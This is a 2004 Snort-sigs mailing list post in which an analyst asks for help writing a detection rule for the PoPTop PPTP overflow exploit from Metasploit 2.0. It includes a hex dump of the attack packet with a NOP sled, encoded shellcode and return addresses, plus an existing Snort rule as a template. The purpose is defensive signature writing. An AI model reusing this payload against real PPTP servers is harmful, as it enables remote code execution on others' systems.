[Snort-sigs] Poptop Negative Read Overflow

Coen Bakkers, Monitored Security coen.bakkers at ...1134...
Sat Apr 24 15:27:08 EDT 2004


Hi,

I am trying to write a rule to catch the PoPTop exploit executed on Metasploit 2.0

Basically this is the dump:

23:51:10.281639 10.251.0.3.35742 > 10.251.0.3.1723: P [tcp sum ok] 0:408(408) ack 1 win 32767 <nop,nop,timestamp 1488438 1488438>: pptp Length=1 CTRL-MSG Magic-Cookie=1a2b3c4d CTRL_MSGTYPE=SCCRQ PROTO_VER(1.0) FRAME_CAP(A) BEARER_CAP(A) MAX_CHAN(0) FIRM_REV(2600) HOSTNAME() VENDOR(Microsoft Windows NT) (DF) (ttl 64, id 5640, len 460)
0x0000   4500 01cc 1608 4000 4006 0d29 0afb 0003        E..... at ...180...@..)....
0x0010   0afb 0003 8b9e 06bb 1999 a031 1900 761b        ...........1..v.
0x0020   8018 7fff 5312 0000 0101 080a 0016 b636        ....S..........6
0x0030   0016 b636 0001 0001 1a2b 3c4d 0001 0000        ...6.....+<M....
0x0040   0100 0000 0000 0001 0000 0001 0000 0a28        ...............(
0x0050   0000 0000 0000 0000 0000 0000 0000 0000        ................
0x0060   0000 0000 0000 0000 0000 0000 0000 0000        ................
0x0070   0000 0000 0000 0000 0000 0000 0000 0000        ................
0x0080   0000 0000 0000 0000 0000 0000 0000 0000        ................
0x0090   4d69 6372 6f73 6f66 7420 5769 6e64 6f77        Microsoft.Window
0x00a0   7320 4e54 0000 0000 0000 0000 0000 0000        s.NT............
0x00b0   0000 0000 0000 0000 0000 0000 0000 0000        ................
0x00c0   0000 0000 0000 0000 0000 0000 0000 0000        ................
0x00d0   9090 9090 9090 9090 9090 9090 9090 9090        ................
0x00e0   9090 9090 9090 9090 9090 9090 9090 9090        ................
0x00f0   9090 9090 9090 9090 9090 9090 9090 9090        ................
0x0100   9090 9090 9090 9090 9090 9090 9090 9090        ................
0x0110   9090 9090 9090 9090 9090 9090 9090 9090        ................
0x0120   9090 9081 c4c0 fbff ffd9 eed9 7424 f45b        ............t$.[
0x0130   31c9 b11b 8173 1701 0101 0183 ebfc e2f4        1....s..........
0x0140   88e4 30c1 30da 4251 6b00 6b03 88e0 b167        ..0.0.BQk.k....g
0x0150   cc81 690b fa01 0269 0301 0ea1 88e0 6b11        ..i....i......k.
0x0160   5051 88e0 5130 c1b1 67b2 02cc 8184 c179        PQ..Q0..g......y
0x0170   324a 88d8 30c1 5ab1 3ecc 8148 78f8 30c1        2J..0.Z.>..Hx.0.
0x0180   30da 30c8 30d3 b1a5 cc81 30c1 5188 e369        0.0.0.....0.Q..i
0x0190   2e2e 7269 692e 6368 6f88 e251 528c 0d25        ..rii.cho..QR..%
0x01a0   b10a cc81 30c1 41cc 8101 0101 00fa ffbf        ....0.A.........
0x01b0   00fa ffbf 00fa ffbf 00fa ffbf 00fa ffbf        ................
0x01c0   00fa ffbf 00fa ffbf 00fa ffbf                  ............

I would like it to trigger on the Length=1 value of the PPTP header as it can be an indicator of the exploit, or am I wrong?

Probably the rule would be similar to:
alert tcp $EXTERNAL_NET any -> $HOME_NET 1723 (msg:"MISC Microsoft PPTP Start Control Request buffer overflow attempt"; flow:to_server,established,no_stream; content:"|00 01|"; offset:2; depth:2; content:"|00 01|"; offset:8; depth:2; dsize:>156; reference:bugtraq,5807; reference:cve,CAN-2002-1214; classtype:attempted-admin; sid:2126; rev:2;) 
as found in the rules.
I have tried to play around with it as a template to get it to work but it doesn't because I am not sure as to where the PPTP header starts in the dump.
Any help on this as well as an explanation on where the PPTP header starts in the dump would be appreciated.
Thanks
Coen Bakkers
Security Analyst.




More information about the Snort-sigs mailing list